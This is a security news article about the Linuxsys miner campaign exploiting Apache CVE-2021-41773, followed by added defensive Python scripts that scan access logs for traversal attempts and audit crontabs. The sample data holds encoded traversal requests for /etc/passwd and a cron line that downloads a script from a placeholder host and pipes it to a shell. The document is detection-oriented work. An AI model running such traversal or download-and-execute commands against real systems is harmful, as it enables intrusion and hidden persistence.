Linuxsys Cryptocurrency Miner Exploits Apache Vulnerability in Stealth Campaign
Cybersecurity researchers have uncovered an ongoing campaign that leverages a known vulnerability in the Apache HTTP Server to deliver a cryptocurrency mining malware known as Linuxsys. This campaign highlights a broader trend in resource hijacking and the growing sophistication of malware distribution techniques.
Vulnerability Exploited
The attack exploits CVE-2021-41773 (CVSS score: 7.5), a path traversal flaw in Apache HTTP Server 2.4.49 that can enable remote code execution. Despite being a known and patched issue, it remains widely exploited due to unpatched servers in production environments.
Infection Chain
According to VulnCheck, the attack begins with a connection from an Indonesian IP address (103.193.177[.]152), after which a shell script is downloaded from repositorylinux[.]org using curl or wget.
Key features of the campaign include:
Malware hosted on compromised legitimate websites, reducing detection likelihood.
Download of the Linuxsys miner from multiple trusted domains.
Use of a cron job ("cron.sh") to maintain persistence across system reboots.
Deployment of Windows payloads, suggesting cross-platform targeting.
“Victims interact with valid SSL sites, complicating detection efforts,” VulnCheck noted.
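The exploitation described above shows up in the Apache access log as requests whose percent-encoded path collapses to a ".." segment once decoded, which is exactly the normalisation the vulnerable 2.4.49 release got wrong. The following detector is an added example (not VulnCheck's code or tooling, and not part of the original article): it parses combined-format access log lines, decodes the request path, flags any request containing a dot segment, and rates an encoded traversal that the server answered with 2xx as the most serious case, since that is the signature of a server that served the request instead of rejecting it. The log lines, hosts and paths in SAMPLE_ACCESS_LOG are constructed for the example.

```python
import re
from urllib.parse import unquote

# Combined log format: host ident user [time] "request line" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+'
)

# Constructed sample log; addresses, paths and user agents are made up.
SAMPLE_ACCESS_LOG = """\
203.0.113.10 - - [17/Jul/2025:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.11 - - [17/Jul/2025:10:01:05 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 2345 "-" "curl/7.68.0"
203.0.113.12 - - [17/Jul/2025:10:01:09 +0000] "GET /../../etc/passwd HTTP/1.1" 400 226 "-" "curl/7.68.0"
203.0.113.13 - - [17/Jul/2025:10:02:00 +0000] "GET /search?q=..%2F..%2Fetc HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.14 - - [17/Jul/2025:10:02:07 +0000] "GET /images/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""


def normalize_path(target: str) -> str:
    """Drop the query string and percent-decode the path twice, so that
    single- and double-encoded dot segments both collapse to '..'."""
    path = target.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    return path


def has_dot_segment(path: str) -> bool:
    """True if any '/'-delimited segment of the decoded path is '..'.
    Only the path is inspected: traversal strings in the query string
    are an application concern, not an Apache path-normalisation one."""
    return any(seg == ".." for seg in path.split("/"))


def classify(raw: str, decoded: str, status: int) -> str:
    """An encoded traversal that the server answered 2xx is the worrying
    case: it suggests the request got past Apache's path normalisation.
    Anything else is an attempt that was (probably) rejected."""
    encoded = raw.split("?", 1)[0] != decoded
    if encoded and 200 <= status < 300:
        return "high"
    return "medium"


def scan_access_log(text: str) -> list:
    """Return one finding per request whose decoded path contains '..'."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip silently
        decoded = normalize_path(m["target"])
        if not has_dot_segment(decoded):
            continue
        status = int(m["status"])
        hits.append({
            "ip": m["ip"], "time": m["ts"], "method": m["method"],
            "raw": m["target"], "decoded": decoded, "status": status,
            "severity": classify(m["target"], decoded, status),
        })
    return hits


if __name__ == "__main__":
    import sys
    # Pass a real access log path as the first argument, or run on the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_ACCESS_LOG
    for h in scan_access_log(text):
        print(f"[{h['severity']}] {h['time']} {h['ip']} {h['method']} "
              f"{h['raw']} -> {h['decoded']} ({h['status']})")
```

Run against the sample, the encoded request from 203.0.113.11 is reported as high because it was encoded and answered 200, while the literal "../" request is reported as medium because Apache's normal handling rejected it with 400; the request carrying traversal characters only in its query string is not reported at all. On a patched server the encoded variant should likewise produce a 4xx, so any "high" finding is worth treating as a possible compromise rather than a mere probe.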
Broader Exploitation Activity
Linuxsys has also been delivered via other vulnerabilities, including:
CVE-2024-36401 – GeoServer GeoTools (CVSS 9.8)
CVE-2023-22527 – Atlassian Confluence
CVE-2023-34960 – Chamilo LMS
CVE-2023-38646 – Metabase
CVE-2024-0012 & CVE-2024-9474 – Palo Alto Networks
The malware campaign appears to avoid low-interaction honeypots, indicating careful victim targeting.
Overlap with H2Miner and Lcrypt0rx
The Linuxsys campaign overlaps with a broader set of attacks associated with H2Miner, a known cryptojacking botnet that also delivers:
Kinsing RAT
XMRig miner
A VBScript-based ransomware known as Lcrypt0rx
Lcrypt0rx is notable for:
Disabling Windows tools and security software.
Attempting to overwrite the Master Boot Record (MBR).
Demanding $1,000 in cryptocurrency, though its encryption is weak and easily reversible.
“Lcrypt0rx likely serves more as scareware than a legitimate ransomware threat,” said security researcher Akshat Pradhan.
Key Takeaways
Long-term campaigns are increasingly using patched vulnerabilities to target unmaintained systems.
Cryptojacking remains financially attractive, especially in cloud environments where hijacked resources lead to increased operational costs.
The use of AI-generated scripts and off-the-shelf tools lowers the barrier for entry, allowing less-skilled attackers to launch complex attacks.
Recommendation
Organizations should:
Patch known vulnerabilities like CVE-2021-41773 promptly.
Monitor outbound connections for unusual download activity.
Employ defense-in-depth strategies, including EDR, firewall rules, and behavior-based detection.
As cloud and Linux environments continue to grow, so does the surface area for these resource exploitation campaigns.
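The persistence technique noted in the infection chain (a cron job running "cron.sh") and the recommendation to watch for unusual download activity both come down to inspecting what the scheduler has been told to run. The audit below is an added example, not part of the article and not VulnCheck's tooling: it parses crontab-style text (user or system crontab lines, including @reboot entries) and flags commands that fetch from the network, pipe into a shell, run from a world-writable temp directory, or hide under a dot-prefixed path. The crontab lines in SAMPLE_CRONTAB, including the /tmp path and the download host, are constructed placeholders and not indicators from the report.

```python
import re

# Constructed crontab text; the temp path, hidden directory and download
# host are made up for this example, not indicators taken from the report.
SAMPLE_CRONTAB = """\
# m h  dom mon dow   command
SHELL=/bin/sh
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /tmp/.x/cron.sh >/dev/null 2>&1
@reboot curl -fsSL http://dl.example.invalid/cron.sh | sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""

SCHEDULE_FIELDS = 5  # minute hour day-of-month month day-of-week
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def split_entry(line: str):
    """Return (schedule, command) for one crontab line, or None for
    comments, blank lines and variable assignments. For system crontabs
    the user column simply stays at the front of the command string."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+=", line):
        return None
    if line.startswith("@"):  # @reboot, @daily, ...
        sched, _, cmd = line.partition(" ")
        return sched, cmd.strip()
    parts = line.split(None, SCHEDULE_FIELDS)
    if len(parts) <= SCHEDULE_FIELDS:
        return None  # malformed line without a command
    return " ".join(parts[:SCHEDULE_FIELDS]), parts[SCHEDULE_FIELDS]


def suspicious_reasons(cmd: str) -> list:
    """Heuristics for a scheduled command; an empty list means no concern."""
    reasons = []
    if re.search(r"\b(curl|wget)\b", cmd):
        reasons.append("downloads from the network")
    if re.search(r"\|\s*(ba)?sh\b", cmd):
        reasons.append("pipes output into a shell")
    if any(d in cmd for d in TEMP_DIRS):
        reasons.append("runs from a world-writable temp directory")
    if re.search(r"/\.[^/\s]", cmd):
        reasons.append("uses a hidden directory or file")
    return reasons


def audit_crontab(text: str) -> list:
    """Return one finding per entry that trips at least one heuristic."""
    findings = []
    for line in text.splitlines():
        entry = split_entry(line)
        if entry is None:
            continue
        sched, cmd = entry
        reasons = suspicious_reasons(cmd)
        if reasons:
            findings.append({"schedule": sched, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    import sys
    # Pass a saved crontab (e.g. the output of `crontab -l`) as the first
    # argument, or run on the constructed sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CRONTAB
    for f in audit_crontab(text):
        print(f"{f['schedule']:<12} {f['command']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

The heuristics are deliberately coarse: a legitimate backup job may well call curl, so the output is a review list for an analyst rather than an automatic verdict. What makes an entry stand out is the combination seen in the sample, a five-minute schedule pointing at a script under a hidden /tmp directory, or an @reboot entry that re-downloads and executes a script on every start, which is precisely how a miner survives a reboot after the original exploit path has been patched.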